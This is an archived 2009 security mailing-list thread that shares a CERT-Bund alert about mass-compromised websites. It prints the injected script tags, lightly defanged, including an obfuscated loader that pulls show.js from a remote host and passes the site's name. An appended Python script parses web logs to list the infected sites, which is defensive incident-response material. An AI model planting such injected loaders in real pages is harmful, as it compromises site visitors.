[nsp-sec] compromised websites again (crew.abnc-portal.com)

Tom Sands tsands at rackspace.com
Tue May 12 13:09:24 EDT 2009


ACK 10532, 27357, 33070, 15395, and 12200

--------------------------------------------------------------------------------
Tom Sands
Chief Network Engineer
Rackspace Hosting
--------------------------------------------------------------------------------

Dirk Stander wrote:
> ----------- nsp-security Confidential --------
> 
> 
> 
> ------------------------------------------------------------------------
> 
> .: Hi,
> 
> I'm sending this by courtesy of Thomas Hungenberg (CERT_BUND / BSI).
> 
>     Regards, Dirk Stander (1&1) :.
> 
> =====================================================================
> 
> Hi teams,
> 
> There was a malicious JavaScript at <hXXp://crew.abnc-portal.com/show.js>.
> 
> A reference to this URL has been injected into thousands of compromised websites
> like this (remove XXX) - usually before the closing BODY tag:
> 
> <!-- ad --><scrXXXipt language=javascript src="hXXp://crew.abnc-portal.com/show.js"></scrXXXipt><!-- /ad -->
> 
> or
> 
> <!-- ad --><!-- ADS Blok v.0.3 --><scrXXXipt language=javaXXXscript>
> funcXXXtion sADS(sIteId) {
>         var thisHome=document;
>         var sIteName=thisHome.location.hostname;
>         var adsurl='crew%2eabnc-portal%2ecom%2F';
>         var adScript='%3Cscr'+'ipt src="http%3A%2F%2F'+adsurl+'show.js?c=';
>         thisHome.write(unescape(adScript+sIteId+'&s='+sIteName+'"%3E%3C/scr'+'ipt%3E'));
> }
> sADS("CI-002643-3");
> </scrXXXipt><!-- ADS Blok v.0.3 --><!-- /ad -->
> 
> 
> For an unknown reason, the IP address for crew.abnc-portal.com has been changed
> to 88.80.216.114 on 2009-04-22.
> 
> 88.80.216.114 is hosting the Swiss security blog 'abuse.ch'.
> This server is not malicious and has not been compromised!
> 
> By analyzing the Referer headers from the requests for /show.js that hit 88.80.216.114,
> we were able to identify compromised websites that have the above mentioned javascript
> injected into one or more pages.
> 
> Please find attached a list of 5.079 compromised hosts that showed up in the Referers
> from 2009-05-01 until 2009-05-08.
> 
> There might be some "false positives" like google.com when users visited a compromised
> website using Google translate.
> 
> 
> Cheers,
> Thomas
> 
> =====================================================================
> 
> 
> ------------------------------------------------------------------------
> 
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
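
The Referer-based identification Thomas describes (requests for /show.js arriving at the sinkhole server, attributed back to the site that embedded the script) can be reproduced against an ordinary web server access log. The script below is an added illustration, not code from the original message, from CERT-Bund or from abuse.ch: it assumes the "combined" log format used by Apache and nginx, uses constructed sample lines with hypothetical hosts under the reserved .invalid TLD, and treats the Google Translate hosts as the kind of "false positive" relay the message warns about.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Assumed input: Apache/nginx "combined" log format
# (client, ident, user, timestamp, request line, status, size, referer, user-agent).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log (hypothetical hosts, documentation IP ranges).
# Lines 1, 2 and 6 come from pages that embed the injected script tag;
# line 3 is a visitor reading such a page through Google Translate;
# lines 4 and 5 carry no usable Referer at all.
SAMPLE_LOG = """\
203.0.113.5 - - [01/May/2009:10:00:01 +0200] "GET /show.js HTTP/1.1" 404 209 "http://www.example-shop.invalid/index.php?page=2" "Mozilla/5.0"
203.0.113.9 - - [01/May/2009:10:00:07 +0200] "GET /show.js?c=CI-000000-0&s=forum.example.invalid HTTP/1.1" 404 209 "http://forum.example.invalid/viewtopic.php?t=12" "Mozilla/5.0"
198.51.100.2 - - [01/May/2009:10:01:13 +0200] "GET /show.js HTTP/1.1" 404 209 "http://translate.google.com/translate?u=http://www.example-shop.invalid/" "Mozilla/5.0"
198.51.100.4 - - [01/May/2009:10:02:40 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [01/May/2009:10:03:55 +0200] "GET /show.js HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [01/May/2009:11:00:00 +0200] "GET /show.js HTTP/1.1" 404 209 "http://www.example-shop.invalid/cart.php" "Mozilla/5.0"
"""

# Referer hosts that relay other people's pages; a hit from them points at the
# page being translated, not at the translator, so they are set aside for
# manual review instead of being reported as compromised.
RELAY_HOSTS = {"translate.google.com", "translate.googleusercontent.com"}


def referer_hosts(log_text, path="/show.js"):
    """Count Referer hostnames of requests for `path`.

    Returns (Counter of hostname -> request count, list of relay Referers
    that were skipped).  Query strings on the request path are ignored so
    that both injection variants (plain src and the '?c=...&s=...' form)
    are matched.
    """
    hits = Counter()
    skipped = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; ignore rather than guess
        req_path = m.group("path").split("?", 1)[0]
        if req_path != path:
            continue
        ref = m.group("referer")
        if not ref or ref == "-":
            continue  # direct fetch, nothing to attribute
        host = urlparse(ref).hostname
        if not host:
            continue
        host = host.lower()
        if host in RELAY_HOSTS:
            skipped.append(ref)
            continue
        hits[host] += 1
    return hits, skipped


def compromised_hosts(log_text, path="/show.js"):
    """Sorted list of hostnames whose pages referred visitors to `path`."""
    hits, _ = referer_hosts(log_text, path)
    return sorted(hits)


if __name__ == "__main__":
    hits, skipped = referer_hosts(SAMPLE_LOG)
    for host, n in hits.most_common():
        print(f"{n:5d}  {host}")
    for ref in skipped:
        print(f"review: {ref}")
```

The host list is what would go to the owners of the affected sites; the skipped relay Referers still carry the real page in their `u=` parameter and can be attributed by hand. A 404 on the sinkhole is expected here, since the sinkhole does not serve the script, so the status code is deliberately not used as a filter.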

